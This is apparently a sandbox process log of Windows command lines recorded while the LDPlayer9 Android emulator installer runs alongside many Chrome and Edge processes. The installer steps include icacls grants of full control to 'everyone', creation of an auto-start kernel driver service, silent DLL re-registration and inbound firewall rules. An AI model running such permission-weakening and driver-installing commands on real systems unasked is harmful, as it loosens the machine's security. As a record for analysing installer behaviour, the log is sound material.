"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2288 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5940 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5860 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3416 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4796 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3916 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2508 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4744 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4852 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6304 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6632 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6712 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6840 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6208 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7120 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7276 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7536 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7724 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7844 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7884 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6204 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7984 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8352 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8364 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8700 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8704 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=9008 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=9140 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8972 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=9444 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe
"C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9332 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=8680 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9832 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=9812 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9724 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=10268 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=4696 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10456 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=10608 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=8140 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8160 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=8364 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10744 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=6160 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=10892 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=11172 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=11156 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11408 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=11576 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=8468 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=11340 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=8400 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=7660 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=11732 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8472 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=8248 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=11500 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5112 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=5104 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7440 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4080 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
F:\LDPlayer\LDPlayer9\LDPlayer.exe
"F:\LDPlayer\LDPlayer9\\LDPlayer.exe" -silence -downloader -openid=1252 -language=en -path="F:\LDPlayer\LDPlayer9\"
F:\LDPlayer\LDPlayer9\dnrepairer.exe
"F:\LDPlayer\LDPlayer9\dnrepairer.exe" listener=394540
C:\Windows\SysWOW64\net.exe
"net" start cryptsvc
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start cryptsvc
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" Softpub.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" Wintrust.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" Initpki.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32" Initpki.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" dssenh.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" rsaenh.dll /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" cryptdlg.dll /s
C:\Windows\SysWOW64\takeown.exe
"takeown" /f "F:\LDPlayer\LDPlayer9\vms" /r /d y
C:\Windows\SysWOW64\icacls.exe
"icacls" "F:\LDPlayer\LDPlayer9\vms" /grant everyone:F /t
C:\Windows\SysWOW64\takeown.exe
"takeown" /f "F:\LDPlayer\LDPlayer9\\system.vmdk"
C:\Windows\SysWOW64\icacls.exe
"icacls" "F:\LDPlayer\LDPlayer9\\system.vmdk" /grant everyone:F /t
C:\Windows\SysWOW64\dism.exe
C:\Windows\system32\dism.exe /Online /English /Get-Features
C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe {4A3E894B-16A0-4C6E-B9BC-26B5A48C983B}
C:\Windows\SysWOW64\sc.exe
sc query HvHost
C:\Windows\SysWOW64\sc.exe
sc query vmms
C:\Windows\SysWOW64\sc.exe
sc query vmcompute
C:\Program Files\ldplayer9box\Ld9BoxSVC.exe
"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" /RegServer
C:\Windows\SYSTEM32\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\VBoxC.dll" /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxClient-x86.dll" /s
C:\Windows\SYSTEM32\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\VBoxProxyStub.dll" /s
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxProxyStub-x86.dll" /s
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc" create Ld9BoxSup binPath= "C:\Program Files\ldplayer9box\Ld9BoxSup.sys" type= kernel start= auto
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc" start Ld9BoxSup
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" New-NetFirewallRule -DisplayName "Ld9BoxSup" -Direction Inbound -Program 'C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe' -RemoteAddress LocalSubnet -Action Allow
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" New-NetFirewallRule -DisplayName "Ld9BoxNat" -Direction Inbound -Program 'C:\Program Files\ldplayer9box\VBoxNetNAT.exe' -RemoteAddress LocalSubnet -Action Allow
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" New-NetFirewallRule -DisplayName "dnplayer" -Direction Inbound -Program 'F:\LDPlayer\LDPlayer9\dnplayer.exe' -RemoteAddress LocalSubnet -Action Allow
F:\LDPlayer\LDPlayer9\driverconfig.exe
"F:\LDPlayer\LDPlayer9\driverconfig.exe"
C:\Windows\SysWOW64\takeown.exe
"takeown" /f F:\LDPlayer\ldmutiplayer\ /r /d y
C:\Windows\SysWOW64\icacls.exe
"icacls" F:\LDPlayer\ldmutiplayer\ /grant everyone:F /t
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/4bUcwDd53d
F:\LDPlayer\LDPlayer9\dnplayer.exe
"F:\LDPlayer\LDPlayer9\\dnplayer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff89be246f8,0x7ff89be24708,0x7ff89be24718
C:\Program Files\ldplayer9box\Ld9BoxSVC.exe
"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" -Embedding
C:\Windows\SysWOW64\sc.exe
sc query HvHost
C:\Windows\SysWOW64\sc.exe
sc query vmms
C:\Windows\SysWOW64\sc.exe
sc query vmcompute
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\ldplayer9box\vbox-img.exe
"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\..\system.vmdk" --uuid 20160302-bbbb-bbbb-54d7-bbbb00000000
C:\Program Files\ldplayer9box\vbox-img.exe
"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\leidian0\data.vmdk" --uuid 20160302-cccc-cccc-54d7-000000000000
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
